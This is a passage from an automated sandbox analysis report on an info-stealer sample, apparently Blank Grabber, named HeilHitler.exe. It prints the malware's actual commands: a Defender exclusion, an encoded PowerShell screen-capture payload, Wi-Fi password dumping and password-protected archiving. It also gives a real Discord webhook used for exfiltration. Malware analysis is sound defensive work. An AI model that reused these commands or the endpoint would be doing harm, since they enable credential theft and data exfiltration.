              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", ProcessId: 7496, ProcessName: cmd.exe
              Sigma detected: Suspicious Execution of Powershell with Base64
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8084, TargetFilename: C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline
              Sigma detected: Files Added To An Archive Using Rar.EXE
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7920, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *, ProcessId: 3400, ProcessName: rar.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7496, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe', ProcessId: 7600, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

              Stealing of Sensitive Information

              barindex
              Sigma detected: Capture Wi-Fi password
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 1928, ProcessName: cmd.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: HeilHitler.exe.7448.1.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1302413781162266715/WJ0cdpWb68IO94MZWMtc7o2HkgZFWYLoExtrMC3fyimxUgR5SCyIRovGkrea9pNRE2_V"}
              Multi AV Scanner detection for submitted file
              Source: HeilHitler.exeReversingLabs: Detection: 47%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,68_2_00007FF702C1901C
              Source: HeilHitler.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: HeilHitler.exe
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.pdbhP source: powershell.exe, 00000026.00000002.1830812751.000002871BA75000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HeilHitler.exe, 00000000.00000003.1677234536.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2040274922.00007FFE13341000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039889853.00007FFE13301000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HeilHitler.exe, 00000000.00000003.1677234536.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2040274922.00007FFE13341000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038522061.00007FFE11EB1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039368203.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: HeilHitler.exe, 00000001.00000002.2036487623.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.1908593127.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: HeilHitler.exe, 00000001.00000002.2039054275.00007FFE126EC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: HeilHitler.exe, 00000001.00000002.2039054275.00007FFE126EC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039626853.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: \0q.pdb source: powershell.exe, 00000026.00000002.1894620467.000002873381B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: HeilHitler.exe, 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: HeilHitler.exe, 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2037493230.00007FFE0EB41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038127785.00007FFE11511000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038813190.00007FFE11ED1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:15:42 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2037789105.00007FFE10301000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.pdb source: powershell.exe, 00000026.00000002.1830812751.000002871BA75000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmp
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF633D683C0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D69280 FindFirstFileExW,FindClose,0_2_00007FF633D69280
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF633D81874
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D69280 FindFirstFileExW,FindClose,1_2_00007FF633D69280
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF633D683C0
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FF633D81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF633D81874
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 1_2_00007FFDFAF43229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,1_2_00007FFDFAF43229
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C246EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,68_2_00007FF702C246EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C1E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,68_2_00007FF702C1E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C688E0 FindFirstFileExA,68_2_00007FF702C688E0
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1302413781162266715/WJ0cdpWb68IO94MZWMtc7o2HkgZFWYLoExtrMC3fyimxUgR5SCyIRovGkrea9pNRE2_V HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 759927User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=8a9179acbaa5554a9b480b1ba637caac
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 09:44:36 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731663877x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sL1ESUKxhK9%2Babw4uCeDjxgqI4thUCNJCC78TML%2F85lNJMjNqLMWZ7Zs%2FqLOkjx%2BeMM11gsaMrJdKoNakvekrPA90Myi75LQhPIN6Y5BQQA7YVaXA%2FFvJrTzqQTB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=f55cd052b753aefed4ac19e3284c0198d78f1511-1731663876; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=g7xrMuiCuj5YxJWgwxHxx7_wo5yDsKgDIiJmgNGLoGA-1731663876289-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e2e4db66acf6bce-DFW
              Source: HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9208C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: HeilHitler.exe, 00000000.00000003.1678668051.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678458745.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678252343.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1681133155.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679683243.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1680725372.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678076504.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 